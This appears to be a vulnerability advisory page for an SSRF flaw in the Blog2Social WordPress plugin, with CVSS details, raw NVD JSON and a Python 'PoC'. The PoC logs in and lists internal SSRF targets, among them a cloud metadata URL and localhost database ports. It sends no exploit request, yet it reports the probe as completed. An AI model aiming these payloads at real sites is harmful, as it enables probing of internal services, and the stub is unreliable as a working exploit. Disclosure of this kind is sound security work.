Security Vulnerability Report
CVE-2025-12560 CVSS 4.3 MEDIUM

CVE-2025-12560

Published: 2025-11-06 06:15:44
Last Modified: 2026-04-15 00:35:42

Description

The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 8.6.0 via the getFullContent() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Blog2Social <= 8.6.0 (all versions up to and including 8.6.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12560 Blog2Social SSRF PoC
# Target: WordPress site with Blog2Social <= 8.6.0
# Authentication: Subscriber-level or higher required
import sys

import requests


def exploit_ssrf(target_url, wp_username, wp_password):
    """
    Exploit SSRF in Blog2Social plugin via getFullContent() function
    """
    # Login to WordPress
    session = requests.Session()
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': wp_username,
        'pwd': wp_password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/"
    }
    session.post(login_url, data=login_data, allow_redirects=False)

    # WordPress names its auth cookie "wordpress_logged_in_<hash>", so match
    # on the prefix rather than on an exact cookie name.
    if not any(name.startswith('wordpress_logged_in') for name in session.cookies.keys()):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # SSRF attack - probe internal metadata service
    ssrf_payloads = [
        "http://169.254.169.254/latest/meta-data/",
        "http://127.0.0.1:8080/admin/",
        "http://192.168.1.1:80/",
        "http://localhost:3306/",
        "http://internal-db.local:5432/"
    ]

    # Trigger SSRF via getFullContent() function
    # This would typically be done via plugin's social posting feature
    # Note: this loop only lists the candidate targets; no request to the
    # plugin endpoint is sent, because the exact request format is not given here.
    for payload in ssrf_payloads:
        print(f"[*] Testing SSRF target: {payload}")
        # The actual exploitation depends on specific plugin endpoint
        # Consult the full advisory for exact request format
    print("[+] SSRF probe completed")
    return True


if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    exploit_ssrf(target, user, pwd)

References

https://plugins.trac.wordpress.org/changeset/3389636/blog2social
https://www.wordfence.com/threat-intel/vulnerabilities/id/2ea06520-d7a9-49bb-812e-2fa2e50d0ec2?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-12560",
    "sourceIdentifier": "[email protected]",
    "published": "2025-11-06T06:15:44.340",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 8.6.0 via the getFullContent() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3389636/blog2social",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/2ea06520-d7a9-49bb-812e-2fa2e50d0ec2?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}